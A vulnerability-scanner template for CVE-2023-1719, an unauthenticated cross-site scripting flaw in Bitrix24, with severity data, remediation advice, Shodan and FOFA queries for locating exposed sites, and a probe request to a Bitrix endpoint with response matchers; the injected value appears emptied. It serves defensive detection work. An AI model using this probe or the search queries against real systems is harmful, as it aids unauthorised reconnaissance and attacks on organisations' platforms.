id: CVE-2023-1719 info: name: Bitrix Component - Cross-Site Scripting author: DhiyaneshDk severity: critical description: | Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables. impact: | Unauthenticated attackers can inject malicious JavaScript and potentially execute arbitrary PHP code if the victim has administrator privileges, compromising the entire Bitrix24 collaboration platform and accessing sensitive business data. remediation: | Update Bitrix24 to a version newer than 22.0.300 that properly initializes variables and sanitizes input in the bitrix/modules/main/tools.php component. reference: - https://starlabs.sg/advisories/23/23-1719/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1719 - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.8613 epss-percentile: 0.99419 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: bitrix24 product: bitrix24 shodan-query: - html:"/bitrix/" - http.html:"/bitrix/" fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24,vuln http: - method: GET path: - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=" matchers-condition: and matchers: - type: word part: body words: - "'LOG_CNT':" - "

" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a004830460221008de2ae1a97990718137d15205a88c92f8695c53690fd7cb6e23fd92610b02e890221009e9058aa3bb762ad031fdbad21f63a80f542c9a85f95918a1302e3ac7670b30f:922c64590222798bb761d5b6d8e72950